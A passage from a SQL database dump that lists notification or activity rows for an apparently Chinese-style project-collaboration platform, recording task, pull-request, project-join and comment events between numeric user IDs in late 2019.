13:00:31','2019-10-29 13:00:31','Project','5'),(321,1,49,45,'Task',NULL,NULL,NULL,NULL,0,NULL,'2019-10-29 14:45:59','2019-10-29 14:45:59','Project','2'),(322,1,49,45,'Task',NULL,NULL,NULL,NULL,1,0,'2019-10-29 15:01:23','2019-10-29 15:01:23','Task','21'),(323,49,1,46,'Task',NULL,NULL,NULL,NULL,0,NULL,'2019-10-29 15:09:33','2019-10-29 15:09:33','Project','5'),(324,1,49,46,'Task',NULL,NULL,NULL,NULL,0,NULL,'2019-10-29 15:10:45','2019-10-29 15:10:45','Project','2'),(325,1,49,46,'Task',NULL,NULL,NULL,NULL,1,0,'2019-10-29 15:12:28','2019-10-29 15:12:28','Task','21'),(326,49,1,45,'Task',NULL,NULL,NULL,NULL,1,0,'2019-10-29 15:13:36','2019-10-29 15:13:36','System','11'),(327,50,1,45,'Task',NULL,NULL,NULL,NULL,1,0,'2019-10-29 15:13:36','2019-10-29 15:13:36','System','11'),(328,59,1,45,'Task',NULL,NULL,NULL,NULL,1,0,'2019-10-29 15:13:36','2019-10-29 15:13:36','System','11'),(329,50,46,178,'JoinProject',NULL,NULL,178,'Project',1,NULL,'2019-10-29 16:29:20','2019-10-29 16:29:20','Apply','4'),(330,46,50,178,'DealProject',NULL,NULL,178,'Project',1,NULL,'2019-10-29 16:29:30','2019-10-29 16:29:30','System','4'),(331,1,61,1,'ApplyUserAuthentication',NULL,NULL,1,'User',1,NULL,'2019-10-29 17:13:49','2019-10-29 17:13:49','Apply',NULL),(332,61,0,1,'ApplyUserAuthentication',NULL,NULL,61,'User',1,NULL,'2019-10-29 17:13:58','2019-10-29 17:13:58','System',NULL),(333,50,46,9,'PullRequest',178,'Project',178,'Project',0,0,'2019-10-29 17:20:06','2019-10-29 17:20:06','Apply',NULL),(334,61,61,10,'PullRequest',186,'Project',186,'Project',1,0,'2019-10-29 18:05:26','2019-10-29 18:05:26','Apply',NULL),(335,61,61,10,'PullRequest',186,'Project',186,'Project',2,0,'2019-10-29 18:05:33','2019-10-29 18:05:33','Project',NULL),(336,61,61,11,'PullRequest',186,'Project',186,'Project',0,0,'2019-10-29 18:14:16','2019-10-29 18:14:16','Apply',NULL),(337,61,61,NULL,'PullRequest',186,'Project',186,'Project',0,0,'2019-10-29 18:40:23','2019-10-29 18:40:23','Apply',NULL),(338,61,61,NULL,'PullRequest',186,'Project',186,'Project',0,0,'2019-10-29 18:40:25','2019-10-29 18:40:25','Apply',NULL),(339,61,61,NULL,'PullRequest',186,'Project',186,'Project',0,0,'2019-10-29 18:40:27','2019-10-29 18:40:27','Apply',NULL),(340,61,61,NULL,'PullRequest',186,'Project',186,'Project',0,0,'2019-10-29 18:40:28','2019-10-29 18:40:28','Apply',NULL),(341,61,61,NULL,'PullRequest',186,'Project',186,'Project',0,0,'2019-10-29 18:40:35','2019-10-29 18:40:35','Apply',NULL),(342,61,61,NULL,'PullRequest',186,'Project',186,'Project',0,0,'2019-10-29 18:41:04','2019-10-29 18:41:04','Apply',NULL),(343,61,61,NULL,'PullRequest',186,'Project',186,'Project',0,0,'2019-10-29 18:41:17','2019-10-29 18:41:17','Apply',NULL),(344,61,61,NULL,'PullRequest',186,'Project',186,'Project',0,0,'2019-10-29 18:41:19','2019-10-29 18:41:19','Apply',NULL),(345,61,61,NULL,'PullRequest',186,'Project',186,'Project',0,0,'2019-10-29 18:42:10','2019-10-29 18:42:10','Apply',NULL),(346,61,61,NULL,'PullRequest',186,'Project',186,'Project',0,0,'2019-10-29 18:42:12','2019-10-29 18:42:12','Apply',NULL),(347,61,61,NULL,'PullRequest',186,'Project',186,'Project',0,0,'2019-10-29 18:42:12','2019-10-29 18:42:12','Apply',NULL),(348,61,61,12,'PullRequest',186,'Project',186,'Project',0,0,'2019-10-29 18:42:22','2019-10-29 18:42:22','Apply',NULL),(349,61,61,NULL,'PullRequest',186,'Project',186,'Project',0,0,'2019-10-29 18:43:48','2019-10-29 18:43:48','Apply',NULL),(350,61,61,NULL,'PullRequest',186,'Project',186,'Project',0,0,'2019-10-29 18:44:01','2019-10-29 18:44:01','Apply',NULL),(351,61,61,13,'PullRequest',186,'Project',186,'Project',0,0,'2019-10-29 18:45:03','2019-10-29 18:45:03','Apply',NULL),(352,50,1,47,'Task',NULL,NULL,NULL,NULL,0,NULL,'2019-10-30 10:08:37','2019-10-30 10:08:37','Project','5'),(353,1,49,2,'ApplyUserAuthentication',NULL,NULL,1,'User',1,NULL,'2019-10-31 14:43:49','2019-10-31 14:43:49','Apply',NULL),(354,49,0,2,'ApplyUserAuthentication',NULL,NULL,49,'User',1,NULL,'2019-10-31 14:45:56','2019-10-31 14:45:56','System',NULL),(355,49,46,187,'JoinProject',NULL,NULL,187,'Project',1,NULL,'2019-10-31 14:51:47','2019-10-31 14:51:47','Apply','4'),(356,46,49,187,'DealProject',NULL,NULL,187,'Project',1,NULL,'2019-10-31 14:52:25','2019-10-31 14:52:25','System','4'),(357,49,46,188,'JoinProject',NULL,NULL,188,'Project',1,NULL,'2019-10-31 15:10:05','2019-10-31 15:10:05','Apply','4'),(358,46,49,188,'DealProject',NULL,NULL,188,'Project',1,NULL,'2019-10-31 15:11:08','2019-10-31 15:11:08','System','4'),(359,49,61,188,'ReporterJoinProject',NULL,NULL,188,'Project',NULL,NULL,'2019-10-31 15:14:21','2019-10-31 15:14:21','System',NULL),(360,49,59,188,'ReporterJoinProject',NULL,NULL,188,'Project',NULL,NULL,'2019-10-31 15:15:28','2019-10-31 15:15:28','System',NULL),(361,49,61,188,'ReporterJoinProject',NULL,NULL,188,'Project',NULL,NULL,'2019-10-31 15:17:12','2019-10-31 15:17:12','System',NULL),(362,49,46,14,'PullRequest',188,'Project',188,'Project',0,0,'2019-10-31 16:23:17','2019-10-31 16:23:17','Apply',NULL),(363,61,46,72,'Journal',64,'Issue',188,'Project',NULL,0,'2019-10-31 17:00:14','2019-10-31 17:00:14','Comment',NULL),(364,46,61,73,'Journal',65,'Issue',188,'Project',NULL,0,'2019-10-31 17:00:59','2019-10-31 17:00:59','Comment',NULL),(365,49,59,188,'ReporterJoinProject',NULL,NULL,188,'Project',NULL,NULL,'2019-10-31 17:04:05','2019-10-31 17:04:05','System',NULL),(366,61,59,74,'Journal',67,'Issue',188,'Project',NULL,0,'2019-10-31 17:04:31','2019-10-31 17:04:31','Comment',NULL),(367,61,49,77,'Journal',67,'Issue',188,'Project',NULL,0,'2019-10-31 17:05:53','2019-10-31 17:05:53','Project',NULL),(368,49,1,48,'Task',NULL,NULL,NULL,NULL,0,NULL,'2019-11-01 15:17:59','2019-11-01 15:17:59','Project','5'),(369,49,1,49,'Task',NULL,NULL,NULL,NULL,0,NULL,'2019-11-01 15:19:51','2019-11-01 15:19:51','Project','5'),(370,59,1,50,'Task',NULL,NULL,NULL,NULL,0,NULL,'2019-11-01 15:27:04','2019-11-01 15:27:04','Project','5'),(371,1,64,3,'ApplyUserAuthentication',NULL,NULL,1,'User',1,NULL,'2019-11-01 15:39:59','2019-11-01 15:39:59','Apply',NULL),(372,64,0,3,'ApplyUserAuthentication',NULL,NULL,64,'User',1,NULL,'2019-11-01 15:40:10','2019-11-01 15:40:10','System',NULL),(373,46,46,189,'ManagerJoinProject',NULL,NULL,189,'Project',NULL,NULL,'2019-11-04 16:18:25','2019-11-04 16:18:25','System','4'),(374,49,1,51,'Task',NULL,NULL,NULL,NULL,0,NULL,'2019-11-05 10:14:55','2019-11-05 10:14:55','Project','6'),(375,49,1,52,'Task',NULL,NULL,NULL,NULL,0,NULL,'2019-11-05 10:21:58','2019-11-05 10:21:58','Project','5'),(376,49,1,53,'Task',NULL,NULL,NULL,NULL,0,NULL,'2019-11-05 10:25:19','2019-11-05 10:25:19','Project','5'),(377,49,1,54,'Task',NULL,NULL,NULL,NULL,0,NULL,'2019-11-05 10:34:33','2019-11-05 10:34:33','Project','6'),(378,49,1,55,'Task',NULL,NULL,NULL,NULL,0,NULL,'2019-11-05 10:58:27','2019-11-05 10:58:27','Project','5'),(379,1,50,82,'Paper',NULL,NULL,55,'Task',1,0,'2019-11-05 11:00:01','2019-11-05 11:00:01','Comment','1'),(380,1,46,83,'Paper',NULL,NULL,55,'Task',1,0,'2019-11-05 11:00:32','2019-11-05 11:00:32','Comment','1'),(381,50,53,190,'JoinProject',NULL,NULL,190,'Project',0,NULL,'2019-11-05 13:50:20','2019-11-05 13:50:20','Apply','4'),(382,1,71,4,'ApplyUserAuthentication',NULL,NULL,1,'User',1,NULL,'2019-11-05 15:35:46','2019-11-05 15:35:46','Apply',NULL),(383,71,0,4,'ApplyUserAuthentication',NULL,NULL,71,'User',1,NULL,'2019-11-05 15:36:18','2019-11-05 15:36:18','System',NULL),(384,1,49,54,'Task',NULL,NULL,NULL,NULL,0,NULL,'2019-11-05 15:51:33','2019-11-05 15:51:33','Project','2'),(385,49,1,56,'Task',NULL,NULL,NULL,NULL,0,NULL,'2019-11-05 16:00:14','2019-11-05 16:00:14','Project','5'),(386,1,50,88,'Paper',NULL,NULL,56,'Task',1,0,'2019-11-05 16:00:28','2019-11-05 16:00:28','Comment','1'),(387,49,1,46,'Task',NULL,NULL,NULL,NULL,1,0,'2019-11-05 16:13:21','2019-11-05 16:13:21','System','11'),(388,59,1,46,'Task',NULL,NULL,NULL,NULL,1,0,'2019-11-05 16:13:21','2019-11-05 16:13:21','System','11'),(389,49,1,54,'Task',NULL,NULL,NULL,NULL,1,0,'2019-11-05 16:14:42','2019-11-05 16:14:42','System','11'),(390,65,1,54,'Task',NULL,NULL,NULL,NULL,1,0,'2019-11-05 16:14:42','2019-11-05 16:14:42','System','11'),(391,64,1,54,'Task',NULL,NULL,NULL,NULL,1,0,'2019-11-05 16:14:42','2019-11-05 16:14:42','System','11'),(392,49,1,46,'Task',NULL,NULL,NULL,NULL,1,0,'2019-11-05 16:16:36','2019-11-05 16:16:36','System','10'),(393,59,1,78,'Paper',NULL,NULL,46,'Task',1,0,'2019-11-05 16:16:36','2019-11-05 16:16:36','System','12'),(394,49,1,45,'Task',NULL,NULL,NULL,NULL,1,0,'2019-11-05 16:16:44','2019-11-05 16:16:44','System','10'),(395,50,1,76,'Paper',NULL,NULL,45,'Task',1,0,'2019-11-05 16:16:44','2019-11-05 16:16:44','System','12'),(396,59,1,77,'Paper',NULL,NULL,45,'Task',1,0,'2019-11-05 16:16:44','2019-11-05 16:16:44','System','12'),(397,49,1,54,'Task',NULL,NULL,NULL,NULL,1,0,'2019-11-05 16:17:19','2019-11-05 16:17:19','System','10'),(398,65,1,84,'Paper',NULL,NULL,54,'Task',1,0,'2019-11-05 16:17:19','2019-11-05 16:17:19','System','12'),(399,64,1,86,'Paper',NULL,NULL,54,'Task',1,0,'2019-11-05 16:17:19','2019-11-05 16:17:19','System','12'),(400,49,46,192,'JoinProject',NULL,NULL,192,'Project',1,NULL,'2019-11-06 16:00:17','2019-11-06 16:00:17','Apply','4'),(401,49,64,192,'ReporterJoinProject',NULL,NULL,192,'Project',NULL,NULL,'2019-11-06 16:00:22','2019-11-06 16:00:22','System',NULL),(402,49,65,192,'ReporterJoinProject',NULL,NULL,192,'Project',NULL,NULL,'2019-11-06 16:00:35','2019-11-06 16:00:35','System',NULL),(403,49,66,192,'ReporterJoinProject',NULL,NULL,192,'Project',NULL,NULL,'2019-11-06 16:03:13','2019-11-06 16:03:13','System',NULL),(404,49,63,192,'ReporterJoinProject',NULL,NULL,192,'Project',NULL,NULL,'2019-11-06 16:16:44','2019-11-06 16:16:44','System',NULL),(405,46,49,192,'DealProject',NULL,NULL,192,'Project',1,NULL,'2019-11-06 16:30:15','2019-11-06 16:30:15','System','4'),(406,46,49,78,'Journal',69,'Issue',192,'Project',NULL,0,'2019-11-06 16:39:06','2019-11-06 16:39:06','Comment',NULL),(407,46,49,79,'Journal',69,'Issue',192,'Project',NULL,0,'2019-11-06 16:53:12','2019-11-06 16:53:12','Project',NULL),(408,49,1,57,'Task',NULL,NULL,NULL,NULL,0,NULL,'2019-11-06 17:04:08','2019-11-06 17:04:08','Project','6'),(409,1,49,57,'Task',NULL,NULL,NULL,NULL,0,NULL,'2019-11-06 17:13:20','2019-11-06 17:13:20','Project','2'),(410,49,1,57,'Task',NULL,NULL,NULL,NULL,1,0,'2019-11-06 17:17:28','2019-11-06 17:17:28','System','11'),(411,66,1,57,'Task',NULL,NULL,NULL,NULL,1,0,'2019-11-06 17:17:28','2019-11-06 17:17:28','System','11'),(412,65,1,57,'Task',NULL,NULL,NULL,NULL,1,0,'2019-11-06 17:17:28','2019-11-06 17:17:28','System','11'),(413,49,1,57,'Task',NULL,NULL,NULL,NULL,1,0,'2019-11-06 17:18:21','2019-11-06 17:18:21','System','10'),(414,66,1,89,'Paper',NULL,NULL,57,'Task',1,0,'2019-11-06 17:18:21','2019-11-06 17:18:21','System','12'),(415,65,1,90,'Paper',NULL,NULL,57,'Task',1,0,'2019-11-06 17:18:21','2019-11-06 17:18:21','System','12'),(420,49,46,194,'JoinProject',NULL,NULL,194,'Project',1,NULL,'2019-11-07 11:13:23','2019-11-07 11:13:23','Apply','4'),(421,46,49,194,'DealProject',NULL,NULL,194,'Project',1,NULL,'2019-11-07 11:13:30','2019-11-07 11:13:30','System','4'),(422,49,65,194,'ReporterJoinProject',NULL,NULL,194,'Project',NULL,NULL,'2019-11-07 11:15:59','2019-11-07 11:15:59','System',NULL),(423,49,46,15,'PullRequest',194,'Project',194,'Project',1,0,'2019-11-07 11:22:40','2019-11-07 11:22:40','Apply',NULL),(424,46,49,15,'PullRequest',194,'Project',194,'Project',2,0,'2019-11-07 11:23:18','2019-11-07 11:23:18','Project',NULL),(425,49,1,58,'Task',NULL,NULL,NULL,NULL,0,NULL,'2019-11-07 11:27:28','2019-11-07 11:27:28','Task','6'),(430,1,1,199,'Project',NULL,NULL,NULL,NULL,0,0,'2019-11-07 15:51:07','2019-11-07 15:51:07','Project','1'),(431,49,1,55,'Review',NULL,NULL,NULL,NULL,1,0,'2019-11-07 15:51:33','2019-11-07 15:51:33','System','2'),(432,49,46,199,'JoinProject',NULL,NULL,199,'Project',1,NULL,'2019-11-07 15:53:31','2019-11-07 15:53:31','Apply','4'),(433,49,59,199,'ReporterJoinProject',NULL,NULL,199,'Project',NULL,NULL,'2019-11-07 15:53:33','2019-11-07 15:53:33','System',NULL),(434,46,49,199,'DealProject',NULL,NULL,199,'Project',1,NULL,'2019-11-07 15:53:58','2019-11-07 15:53:58','System','4'),(435,49,64,199,'ReporterJoinProject',NULL,NULL,199,'Project',NULL,NULL,'2019-11-07 16:20:28','2019-11-07 16:20:28','System',NULL),(436,64,46,82,'Journal',74,'Issue',199,'Project',NULL,0,'2019-11-07 16:21:55','2019-11-07 16:21:55','Comment',NULL),(437,49,46,16,'PullRequest',199,'Project',199,'Project',1,0,'2019-11-07 16:24:44','2019-11-07 16:24:44','Apply',NULL),(438,46,49,16,'PullRequest',199,'Project',199,'Project',2,0,'2019-11-07 16:26:32','2019-11-07 16:26:32','Project',NULL),(439,59,1,59,'Task',NULL,NULL,NULL,NULL,0,NULL,'2019-11-07 16:42:59','2019-11-07 16:42:59','Task','6'),(440,49,1,60,'Task',NULL,NULL,NULL,NULL,0,NULL,'2019-11-07 16:43:38','2019-11-07 16:43:38','Task','6'),(441,1,49,60,'Task',NULL,NULL,NULL,NULL,0,NULL,'2019-11-07 16:51:13','2019-11-07 16:51:13','Project','2'),(442,49,1,60,'Task',NULL,NULL,NULL,NULL,1,0,'2019-11-07 16:55:34','2019-11-07 16:55:34','System','11'),(443,64,1,60,'Task',NULL,NULL,NULL,NULL,1,0,'2019-11-07 16:55:34','2019-11-07 16:55:34','System','11'),(444,63,1,60,'Task',NULL,NULL,NULL,NULL,1,0,'2019-11-07 16:55:34','2019-11-07 16:55:34','System','11'),(445,49,1,60,'Task',NULL,NULL,NULL,NULL,1,0,'2019-11-07 16:56:04','2019-11-07 16:56:04','System','10'),(446,64,1,94,'Paper',NULL,NULL,60,'Task',1,0,'2019-11-07 16:56:04','2019-11-07 16:56:04','System','12'),(447,63,1,95,'Paper',NULL,NULL,60,'Task',1,0,'2019-11-07 16:56:04','2019-11-07 16:56:04','System','12'),(448,64,71,83,'Journal',74,'Issue',199,'Project',NULL,0,'2019-11-08 09:11:56','2019-11-08 09:11:56','Comment',NULL),(449,49,65,199,'ReporterJoinProject',NULL,NULL,199,'Project',NULL,NULL,'2019-11-08 10:52:01','2019-11-08 10:52:01','System',NULL),(450,49,63,199,'ReporterJoinProject',NULL,NULL,199,'Project',NULL,NULL,'2019-11-08 11:02:31','2019-11-08 11:02:31','System',NULL),(451,65,50,84,'Journal',75,'Issue',199,'Project',NULL,0,'2019-11-08 11:08:19','2019-11-08 11:08:19','Project',NULL),(452,63,49,85,'Journal',76,'Issue',199,'Project',NULL,0,'2019-11-08 11:13:50','2019-11-08 11:13:50','Comment',NULL),(453,65,49,86,'Journal',87,'Issue',199,'Project',NULL,0,'2019-11-08 11:20:01','2019-11-08 11:20:01','Comment',NULL),(454,65,49,87,'Journal',89,'Issue',199,'Project',NULL,0,'2019-11-08 11:23:03','2019-11-08 11:23:03','Comment',NULL),(455,46,65,88,'Journal',91,'Issue',199,'Project',NULL,0,'2019-11-08 11:27:49','2019-11-08 11:27:49','Comment',NULL),(456,46,65,89,'Journal',92,'Issue',199,'Project',NULL,0,'2019-11-08 11:29:30','2019-11-08 11:29:30','Comment',NULL),(457,46,63,90,'Journal',92,'Issue',199,'Project',NULL,0,'2019-11-08 11:29:59','2019-11-08 11:29:59','Comment',NULL),(458,46,65,91,'Journal',92,'Issue',199,'Project',NULL,0,'2019-11-08 11:30:46','2019-11-08 11:30:46','Comment',NULL),(459,65,50,93,'Journal',75,'Issue',199,'Project',NULL,0,'2019-11-08 11:42:04','2019-11-08 11:42:04','Project',NULL),(460,63,50,94,'Journal',85,'Issue',199,'Project',NULL,0,'2019-11-08 11:43:04','2019-11-08 11:43:04','Project',NULL),(461,65,50,95,'Journal',75,'Issue',199,'Project',NULL,0,'2019-11-08 11:43:35','2019-11-08 11:43:35','Project',NULL),(462,65,50,96,'Journal',75,'Issue',199,'Project',NULL,0,'2019-11-08 11:44:16','2019-11-08 11:44:16','Project',NULL),(463,46,50,97,'Journal',73,'Issue',199,'Project',NULL,0,'2019-11-08 14:35:38','2019-11-08 14:35:38','Project',NULL),(464,46,50,98,'Journal',73,'Issue',199,'Project',NULL,0,'2019-11-08 14:36:00','2019-11-08 14:36:00','Project',NULL),(465,64,50,99,'Journal',74,'Issue',199,'Project',NULL,0,'2019-11-08 14:36:34','2019-11-08 14:36:34','Project',NULL),(466,63,50,100,'Journal',76,'Issue',199,'Project',NULL,0,'2019-11-08 14:37:02','2019-11-08 14:37:02','Project',NULL),(467,65,50,101,'Journal',77,'Issue',199,'Project',NULL,0,'2019-11-08 14:37:25','2019-11-08 14:37:25','Project',NULL),(468,64,50,102,'Journal',78,'Issue',199,'Project',NULL,0,'2019-11-08 14:37:46','2019-11-08 14:37:46','Project',NULL),(469,63,50,103,'Journal',79,'Issue',199,'Project',NULL,0,'2019-11-08 14:38:08','2019-11-08 14:38:08','Project',NULL),(470,64,50,104,'Journal',80,'Issue',199,'Project',NULL,0,'2019-11-08 14:38:27','2019-11-08 14:38:27','Project',NULL),(471,64,50,105,'Journal',81,'Issue',199,'Project',NULL,0,'2019-11-08 14:40:39','2019-11-08 14:40:39','Project',NULL),(472,49,50,106,'Journal',82,'Issue',199,'Project',NULL,0,'2019-11-08 14:41:09','2019-11-08 14:41:09','Project',NULL),(473,64,50,107,'Journal',83,'Issue',199,'Project',NULL,0,'2019-11-08 14:44:36','2019-11-08 14:44:36','Project',NULL),(474,64,50,108,'Journal',84,'Issue',199,'Project',NULL,0,'2019-11-08 14:44:48','2019-11-08 14:44:48','Project',NULL),(475,64,50,109,'Journal',86,'Issue',199,'Project',NULL,0,'2019-11-08 14:44:58','2019-11-08 14:44:58','Project',NULL),(476,65,50,110,'Journal',87,'Issue',199,'Project',NULL,0,'2019-11-08 14:49:14','2019-11-08 14:49:14','Project',NULL),(477,49,50,111,'Journal',88,'Issue',199,'Project',NULL,0,'2019-11-08 14:49:24','2019-11-08 14:49:24','Project',NULL),(478,65,50,112,'Journal',89,'Issue',199,'Project',NULL,0,'2019-11-08 14:49:33','2019-11-08 14:49:33','Project',NULL),(479,46,50,113,'Journal',91,'Issue',199,'Project',NULL,0,'2019-11-08 14:49:43','2019-11-08 14:49:43','Project',NULL),(480,46,50,114,'Journal',92,'Issue',199,'Project',NULL,0,'2019-11-08 14:49:53','2019-11-08 14:49:53','Project',NULL),(481,64,50,115,'Journal',84,'Issue',199,'Project',NULL,0,'2019-11-08 14:50:38','2019-11-08 14:50:38','Project',NULL),(482,64,50,116,'Journal',86,'Issue',199,'Project',NULL,0,'2019-11-08 14:50:47','2019-11-08 14:50:47','Project',NULL),(483,49,50,117,'Journal',88,'Issue',199,'Project',NULL,0,'2019-11-08 14:51:32','2019-11-08 14:51:32','Project',NULL),(484,65,50,118,'Journal',87,'Issue',199,'Project',NULL,0,'2019-11-08 14:51:42','2019-11-08 14:51:42','Project',NULL),(485,49,1,61,'Task',NULL,NULL,NULL,NULL,0,NULL,'2019-11-08 14:57:17','2019-11-08 14:57:17','Task','6'),(486,49,1,62,'Task',NULL,NULL,NULL,NULL,0,NULL,'2019-11-08 14:57:46','2019-11-08 14:57:46','Task','6'),(487,49,1,63,'Task',NULL,NULL,NULL,NULL,0,NULL,'2019-11-08 14:57:52','2019-11-08 14:57:52','Task','6'),(488,49,1,64,'Task',NULL,NULL,NULL,NULL,0,NULL,'2019-11-08 14:58:25','2019-11-08 14:58:25','Task','6'),(489,49,1,65,'Task',NULL,NULL,NULL,NULL,0,NULL,'2019-11-08 14:59:49','2019-11-08 14:59:49','Task','6'),(490,49,46,17,'PullRequest',199,'Project',199,'Project',1,0,'2019-11-08 19:54:44','2019-11-08 19:54:44','Apply',NULL),(491,49,66,199,'ReporterJoinProject',NULL,NULL,199,'Project',NULL,NULL,'2019-11-10 12:43:36','2019-11-10 12:43:36','System',NULL),(492,1,49,61,'Task',NULL,NULL,NULL,NULL,0,NULL,'2019-11-10 13:48:56','2019-11-10 13:48:56','Project','2'),(493,1,49,62,'Task',NULL,NULL,NULL,NULL,0,NULL,'2019-11-10 13:49:52','2019-11-10 13:49:52','Project','2'),(494,66,49,120,'Journal',96,'Issue',199,'Project',NULL,0,'2019-11-11 08:12:56','2019-11-11 08:12:56','Project',NULL),(495,66,49,121,'Journal',95,'Issue',199,'Project',NULL,0,'2019-11-11 08:13:10','2019-11-11 08:13:10','Project',NULL),(496,66,49,122,'Journal',94,'Issue',199,'Project',NULL,0,'2019-11-11 08:13:21','2019-11-11 08:13:21','Project',NULL),(497,66,49,123,'Journal',93,'Issue',199,'Project',NULL,0,'2019-11-11 08:13:41','2019-11-11 08:13:41','Project',NULL),(498,49,49,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 08:40:22','2019-11-11 08:40:22','Apply',NULL),(499,49,49,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 08:40:26','2019-11-11 08:40:26','Apply',NULL),(500,49,49,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 08:40:29','2019-11-11 08:40:29','Apply',NULL),(501,49,46,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 08:42:20','2019-11-11 08:42:20','Apply',NULL),(502,49,46,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 08:42:25','2019-11-11 08:42:25','Apply',NULL),(503,49,46,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 08:42:29','2019-11-11 08:42:29','Apply',NULL),(504,49,46,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 08:42:32','2019-11-11 08:42:32','Apply',NULL),(505,49,46,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 08:42:40','2019-11-11 08:42:40','Apply',NULL),(506,49,46,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 08:42:42','2019-11-11 08:42:42','Apply',NULL),(507,49,46,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 08:42:47','2019-11-11 08:42:47','Apply',NULL),(508,49,46,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 08:42:58','2019-11-11 08:42:58','Apply',NULL),(509,49,46,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 08:43:00','2019-11-11 08:43:00','Apply',NULL),(510,49,46,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 08:43:01','2019-11-11 08:43:01','Apply',NULL),(511,49,46,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 08:43:10','2019-11-11 08:43:10','Apply',NULL),(512,49,46,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 08:43:11','2019-11-11 08:43:11','Apply',NULL),(513,49,46,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 08:43:12','2019-11-11 08:43:12','Apply',NULL),(514,49,46,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 08:46:41','2019-11-11 08:46:41','Apply',NULL),(515,49,46,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 08:46:43','2019-11-11 08:46:43','Apply',NULL),(516,49,49,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 08:47:54','2019-11-11 08:47:54','Apply',NULL),(517,49,49,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 08:47:57','2019-11-11 08:47:57','Apply',NULL),(518,49,49,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 08:47:58','2019-11-11 08:47:58','Apply',NULL),(519,49,49,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 08:48:06','2019-11-11 08:48:06','Apply',NULL),(520,49,49,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 08:48:07','2019-11-11 08:48:07','Apply',NULL),(521,49,49,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 08:48:08','2019-11-11 08:48:08','Apply',NULL),(522,49,49,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 08:48:10','2019-11-11 08:48:10','Apply',NULL),(523,49,49,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 08:49:05','2019-11-11 08:49:05','Apply',NULL),(524,49,49,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 08:49:06','2019-11-11 08:49:06','Apply',NULL),(525,49,49,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 08:49:17','2019-11-11 08:49:17','Apply',NULL),(526,49,49,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 08:49:19','2019-11-11 08:49:19','Apply',NULL),(527,49,49,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 08:49:21','2019-11-11 08:49:21','Apply',NULL),(528,49,49,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 08:55:15','2019-11-11 08:55:15','Apply',NULL),(529,49,49,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 08:55:18','2019-11-11 08:55:18','Apply',NULL),(530,49,49,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 08:55:19','2019-11-11 08:55:19','Apply',NULL),(531,49,49,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 08:55:27','2019-11-11 08:55:27','Apply',NULL),(532,50,50,18,'PullRequest',202,'Project',202,'Project',0,0,'2019-11-11 08:56:27','2019-11-11 08:56:27','Apply',NULL),(533,49,49,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 08:56:33','2019-11-11 08:56:33','Apply',NULL),(534,49,66,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 08:59:43','2019-11-11 08:59:43','Apply',NULL),(535,49,66,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 08:59:44','2019-11-11 08:59:44','Apply',NULL),(536,49,66,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 08:59:46','2019-11-11 08:59:46','Apply',NULL),(537,49,66,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 08:59:54','2019-11-11 08:59:54','Apply',NULL),(538,49,46,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 09:00:31','2019-11-11 09:00:31','Apply',NULL),(539,49,66,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 09:00:33','2019-11-11 09:00:33','Apply',NULL),(540,49,46,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 09:00:34','2019-11-11 09:00:34','Apply',NULL),(541,49,46,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 09:00:35','2019-11-11 09:00:35','Apply',NULL),(542,49,46,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 09:01:01','2019-11-11 09:01:01','Apply',NULL),(543,49,46,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 09:01:03','2019-11-11 09:01:03','Apply',NULL),(544,49,49,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 09:01:04','2019-11-11 09:01:04','Apply',NULL),(545,49,49,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 09:01:06','2019-11-11 09:01:06','Apply',NULL),(546,49,49,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 09:01:07','2019-11-11 09:01:07','Apply',NULL),(547,49,46,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 09:01:07','2019-11-11 